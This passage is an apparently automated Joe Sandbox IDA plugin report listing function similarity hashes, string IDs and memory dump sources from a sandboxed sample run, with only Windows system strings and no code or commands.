                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: kLsE
                                                      • API String ID: 3446177414-3058123920
                                                      • Opcode ID: 6172bd3afb7d472d408836c026099e4e5b8becfc195ddb16bd15116dc332a355
                                                      • Instruction ID: 79972522bf271306f58dcfd4d5ae8e0689d776d619183167388c69233b2dca87
                                                      • Opcode Fuzzy Hash: 6172bd3afb7d472d408836c026099e4e5b8becfc195ddb16bd15116dc332a355
                                                      • Instruction Fuzzy Hash: 174154712803418AE711DF68EC86F653FA4EB20774F10062EEDA0AA1C1CB7D5483DBA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@
                                                      • API String ID: 0-149943524
                                                      • Opcode ID: 7af0573d25812ff2a825aa94d960e6f0f50d11f629731ef9825c4497666ca34c
                                                      • Instruction ID: 042dbfe520371ed3dc987b8f3f7c95f9bebe8f865f6495f921f9984469d169b9
                                                      • Opcode Fuzzy Hash: 7af0573d25812ff2a825aa94d960e6f0f50d11f629731ef9825c4497666ca34c
                                                      • Instruction Fuzzy Hash: 2132ABB86093519FD7248F14C490B3EB7E1EFA8764F50492EF9958B790E734E980CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: b4ec99fc2378b4b82047ba89371c07cd5b5c56363202120796476109f2640c6f
                                                      • Instruction ID: 568529e814a5feda4a16193a79b52d37dc2b9628d8018c2ca27891cefd50b20c
                                                      • Opcode Fuzzy Hash: b4ec99fc2378b4b82047ba89371c07cd5b5c56363202120796476109f2640c6f
                                                      • Instruction Fuzzy Hash: 8D31DF75202B0AFFE7418F24CD48F99BBA5FF64754F000025D91057A50DB78A921DFE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: $$$
                                                      • API String ID: 3446177414-233714265
                                                      • Opcode ID: 8873865c5453ff2c19607afbf03257ea9d48f856540cb55e9df35876ff77fe6a
                                                      • Instruction ID: 80f8060a2b19a10efb851dec46ad5f28e692c3f270ec22bc8025ba74562b03ac
                                                      • Opcode Fuzzy Hash: 8873865c5453ff2c19607afbf03257ea9d48f856540cb55e9df35876ff77fe6a
                                                      • Instruction Fuzzy Hash: E761DF75A02789DFEB20CFA8C584BADB7F1FF64314F104429D525AB681CB78A941CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                      • API String ID: 0-118005554
                                                      • Opcode ID: 1364f2a58a34bb2209fbf6c96dd4b27e18423b08adc049fabf507eeaf0d8f3f9
                                                      • Instruction ID: 83ffe0e1c779e788901f842ad58dc372bcdfc7d3fa574c7cbc7509a400d4de50
                                                      • Opcode Fuzzy Hash: 1364f2a58a34bb2209fbf6c96dd4b27e18423b08adc049fabf507eeaf0d8f3f9
                                                      • Instruction Fuzzy Hash: DF31F6762087459FD302CF28D844B5AB7E4EFAA760F020869F854CB790EB38E905CB53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local\$@
                                                      • API String ID: 0-380025441
                                                      • Opcode ID: 2fa02268ed3cd55ea461ddb578165a32b42cd84016e0bda782048abaec1e4c0a
                                                      • Instruction ID: cae462d3c232a8f6644cbbb29a6614547c6a31f28094cb33cfa7972847763b45
                                                      • Opcode Fuzzy Hash: 2fa02268ed3cd55ea461ddb578165a32b42cd84016e0bda782048abaec1e4c0a
                                                      • Instruction Fuzzy Hash: 5D31A4B95093049FE310CF2CD480A5BBBE8EF986A4F44492EF59483610DA39DD04CBD3
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 37872A95
                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 37872A90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                      • API String ID: 0-2653619699
                                                      • Opcode ID: 54319e1094a870e62da9dfada7a841a27564c4575cdedba82afd28194e3d4abe
                                                      • Instruction ID: d82606abb4c105536c784cfbfd694daeb5d5acc2c2c1802cac2fe6ec2280807c
                                                      • Opcode Fuzzy Hash: 54319e1094a870e62da9dfada7a841a27564c4575cdedba82afd28194e3d4abe
                                                      • Instruction Fuzzy Hash: 801106BAB01344BBF7268E4D9D81F6A77A99FB8B64F1880697904EB240D674DD0086E0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 378D3356
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID:
                                                      • API String ID: 4062629308-0
                                                      • Opcode ID: d7dd9ea341a19cc0ed3d1fbc025bc23f3e442057a4008d572f4fd3b6ac6749ee
                                                      • Instruction ID: b45f7eed220fe12fdf8ae03331124ea01da78be0f7d89c6602fb6fa9070741bf
                                                      • Opcode Fuzzy Hash: d7dd9ea341a19cc0ed3d1fbc025bc23f3e442057a4008d572f4fd3b6ac6749ee
                                                      • Instruction Fuzzy Hash: 95C124B9901719CFDB60CF1AC8847A9BBF1FB98324F5081AED54DA7650E734AA81CF40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 7405f2bf1dec23e481d0320576a0ae59172ef21dd23c77f5bbc75d0282892b7e
                                                      • Instruction ID: e71e514b1c0cd1e9f7499a7e1f4210e3e5e3524c7b1effdd07b57f9697c3ec8a
                                                      • Opcode Fuzzy Hash: 7405f2bf1dec23e481d0320576a0ae59172ef21dd23c77f5bbc75d0282892b7e
                                                      • Instruction Fuzzy Hash: C9B110B5A08380DFD354CF28C880A5ABBE1BF98724F54496EE899C7352D734E945CF42
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b8ea3bd8cc5e47e92b3bbc6797f16fcf35f1aa7702ef1a1c5a464fae53d77d4
                                                      • Instruction ID: 4f685593a6fb0ee8513025c2dc12f9ba6cb467f5cd6fbd2cd670b01d765fc893
                                                      • Opcode Fuzzy Hash: 2b8ea3bd8cc5e47e92b3bbc6797f16fcf35f1aa7702ef1a1c5a464fae53d77d4
                                                      • Instruction Fuzzy Hash: E3A1BC75A08741EFE710CF28C880A1ABBE6FFA8754F10492EE59597350EB34E945CF92
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9a3d5281ace6788c70ce92aa1a759c4fedabec5b1d5c1ede8ac3e88e5a5be5a
                                                      • Instruction ID: e26b6c24dfb29afc9d6512095101083c3e2d92239e3871cd2983d7de8e2cd332
                                                      • Opcode Fuzzy Hash: c9a3d5281ace6788c70ce92aa1a759c4fedabec5b1d5c1ede8ac3e88e5a5be5a
                                                      • Instruction Fuzzy Hash: C5614D75B00606EFDB08CF68C880BADFBB5BF98250F14826ED519A7300DB34A941CF95
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 982736c3e4bb75c249531daab4b6dd1f0bf8362e9a4c68fa7f992a640a070697
                                                      • Instruction ID: b33b498e065b8a179aa74ef5670940366e14c2ede3598ea23296d0d13009e329
                                                      • Opcode Fuzzy Hash: 982736c3e4bb75c249531daab4b6dd1f0bf8362e9a4c68fa7f992a640a070697
                                                      • Instruction Fuzzy Hash: 10414DB8D01288EFDB10DFADD880AAEBBF4FB58350F50816ED458A7611D735A945CFA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: ebc231efc0d32a67d2dd329f32ed69bfc856f9316b678ccf44edf98be17cebd7
                                                      • Instruction ID: a77409f884485f4a59cdb2724d4d4bc052012ea008401a45b632ee880de3bb46
                                                      • Opcode Fuzzy Hash: ebc231efc0d32a67d2dd329f32ed69bfc856f9316b678ccf44edf98be17cebd7
                                                      • Instruction Fuzzy Hash: C4310072600204AFC311DF28CA84A6677A6FF84364F54466AEC549F3A1DB3AED46CFD0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 8a68e5d877454e8abf89f5b1077af6b2df7abe2d907f6c261fa8f6a69285890d
                                                      • Instruction ID: 64d32975b25866a39170e194551562d43b46eaf16cba7146f094ced2a6b21976
                                                      • Opcode Fuzzy Hash: 8a68e5d877454e8abf89f5b1077af6b2df7abe2d907f6c261fa8f6a69285890d
                                                      • Instruction Fuzzy Hash: DD318B75616A09BFEB418F28CE44E9ABBA6FF68654F405029ED1087B50DB34E831CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: c8fc7740f5bef40d51edd06dbae9160de875346cdd502b0ed91c573a4ee6f599
                                                      • Instruction ID: 4d7f1a426e55ac49a0f9ddd97a264834eafbfb416026f1c348a1d70d8826ec5d
                                                      • Opcode Fuzzy Hash: c8fc7740f5bef40d51edd06dbae9160de875346cdd502b0ed91c573a4ee6f599
                                                      • Instruction Fuzzy Hash: 7F212679305350AFD7219F19CD94B1ABBA5FFAAB20F42066DE8504BB50DB35E844CF82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 5e3268b2d15ecb195c2e3480bb5cbf6698ec7f10a58708d4b36c910d0f7d947f
                                                      • Instruction ID: f84d78dc416870979071381da29d94bdc1d2ae524390fcdf228e5d423998022f
                                                      • Opcode Fuzzy Hash: 5e3268b2d15ecb195c2e3480bb5cbf6698ec7f10a58708d4b36c910d0f7d947f
                                                      • Instruction Fuzzy Hash: 24F0F032100640AFD3319B09CD04F8ABBEDEF84710F080519E54293190D6A5B909CA60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: W
                                                      • API String ID: 0-655174618
                                                      • Opcode ID: 97d972dbdd57a4eb6d5af2f70a07c708babefc59bdb2416453b7e41a739f3f56
                                                      • Instruction ID: 7208db54ce6c6f848264be9126bd780d9c2833ebbb5bb6e35efb764c7f75526e
                                                      • Opcode Fuzzy Hash: 97d972dbdd57a4eb6d5af2f70a07c708babefc59bdb2416453b7e41a739f3f56
                                                      • Instruction Fuzzy Hash: 82A138B5D007289FDB21CF29CC80BD9B7B2AF69315F1141EAD849A7251DB34AE81CF81
                                                      Strings
                                                      • System Volume Information, xrefs: 378ADEBE
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: System Volume Information
                                                      • API String ID: 0-764423717
                                                      • Opcode ID: 56ff151e910765b3778ade6d526cf41820f58f253c53456fbbc6ee6e7b85d388
                                                      • Instruction ID: 3554402ff420909a5cd417c55b69d97bd472f43115d82ce6c3dd2f95f57899f3
                                                      • Opcode Fuzzy Hash: 56ff151e910765b3778ade6d526cf41820f58f253c53456fbbc6ee6e7b85d388
                                                      • Instruction Fuzzy Hash: 34618A71508305AFD321DF54CC80E6BB7E9EFA8B94F40092DF980972A0E678DD54CBA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction ID: 2b460bdb54c8ab015978096ae38b72025e04106ad5016ccb89dc42ca1320e1d5
                                                      • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                      • Instruction Fuzzy Hash: 22612BB5D0121DAFEB11CFA9CC44BAEBBB4FFA4764F104169E920A7290D7789A01CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction ID: 8dd468ffa35764f33db313ac14ce1093f32ef485b42510f15bb05f2c4c66d64c
                                                      • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                      • Instruction Fuzzy Hash: 48517BB2514705FFE7118F58CC40F6AB7E8FBA8760F400929B99497290DBB8ED04CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                      • Instruction ID: ffc8dc9d7a77b94611a6c6b6d7b318163b40ac34860ac8055531b6693b7e72d1
                                                      • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                      • Instruction Fuzzy Hash: 24518D756057149FD321CF19C840A6BBBF8FF98750F00892EF9A587690E7B4E914CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PreferredUILanguages
                                                      • API String ID: 0-1884656846
                                                      • Opcode ID: 610dd61f5d77d9add136aadc2e0839b2c4ba877dc16462e8b8c81a0f943d564e
                                                      • Instruction ID: 31e32976304e963acba86a107ed21126b28d862231857368394d51d050c0b3c9
                                                      • Opcode Fuzzy Hash: 610dd61f5d77d9add136aadc2e0839b2c4ba877dc16462e8b8c81a0f943d564e
                                                      • Instruction Fuzzy Hash: 7641C676D00219ABDF21DE98C840BEE7BF9EF58760F010166E851AB750D674EE48CFA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      • Opcode ID: 8d7c507ab4ef7c8028b1613b799640c5b80cf7ab4f4cf5e1108af7363e4bab17
                                                      • Instruction ID: 247d74bcb4fe1ef635ce2c138b63412e73506a93e3291a074a3a880a666b0341
                                                      • Opcode Fuzzy Hash: 8d7c507ab4ef7c8028b1613b799640c5b80cf7ab4f4cf5e1108af7363e4bab17
                                                      • Instruction Fuzzy Hash: 5431A3F9B40302BFE7148F69D851B2677E5EB68760F90803AE504DF782E6759C828B90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction ID: fc5beddfdbd30a0f2398ef81facaf718d448e3358d71931e914e7ea81c86d733
                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction Fuzzy Hash: 81419D79A0161AAFEB198F48C890BBEB7B5EF64751F00405AE955A7200DB34E981CFE1
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 37800058
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
